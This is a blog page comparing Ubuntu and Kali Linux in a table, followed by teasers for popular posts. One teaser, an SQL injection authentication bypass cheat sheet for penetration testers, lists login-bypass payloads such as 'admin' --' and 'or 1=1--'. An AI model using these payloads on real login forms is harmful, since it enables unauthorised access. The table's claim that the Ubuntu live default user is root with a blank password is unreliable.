Skip to main content

UBUNTU vs KALI LINUX

 

Difference between Ubuntu and Kali Linux

S.No.UbuntuKali Linux
1.Developed by canonical.Developed by Offensive Security.
2.Ubuntu was initially released on 20 October 2004.Kali was initially released on 13 March 2013.
3.Ubuntu is used for daily use or on server.Kali is used by security researchers or ethical hackers for security purposes
4.Latest version(2020.04) of ubuntu uses Gnome-terminal by default.Latest version(2020.2) of kali uses qterminal by default.
5.Latest Ubuntu consists of the Gnome environment by default, though it allows you to change the same.Latest Kali consists of the xfce environment by default, though it allows you to change the same.
6.Ubuntu doesn’t comes packed with hacking and penetration testing tools.Kali comes packed with hacking and penetration testing tools.
7.Comes with a user friendly InterfaceComes with a less user friendly Interface as compared to ubuntu.
8.Ubuntu is a good option for beginners to Linux.Kali Linux is a good option for those who are intermediate in Linux.
9.Latest Ubuntu live has the default username as root.Latest Kali Linux has a default username as kali.
10.Latest Ubuntu live has the default password as (blank).Latest Kali Linux has a default password as kali.

Comments

Popular posts from this blog

SQL Injection Authentication Bypass Cheat Sheet

  This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).If you have any other suggestions please feel fr ee to leave a comment in order to improve and expand the list. or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') ...

WHAT IS SESSION HIJACKING?

  What is Session Hijacking? A session is the period of time when you as a user are actively accessing an application, website, or other online service. Each user session begins when you log into a website or app and ends when you log out of it. For example, when you type your username and password into a banking application, that begins your session on that online application. When you log into an online application, for example, amzon.com, their server typically generates a temporary session cookie in your browser. This cookie tells your browser that you are logged in and have been authenticated on the server by Amazon. Each temporary session cookie is marked by a unique session ID, or key. If a hacker is able to access your unique session ID, they can access your session. Let us take the example of Facebook. For example, when you log into Facebook, a session begins. This allows you to keep using Facebook (even if you close and reopen the web browser) until you click on ‘log out’...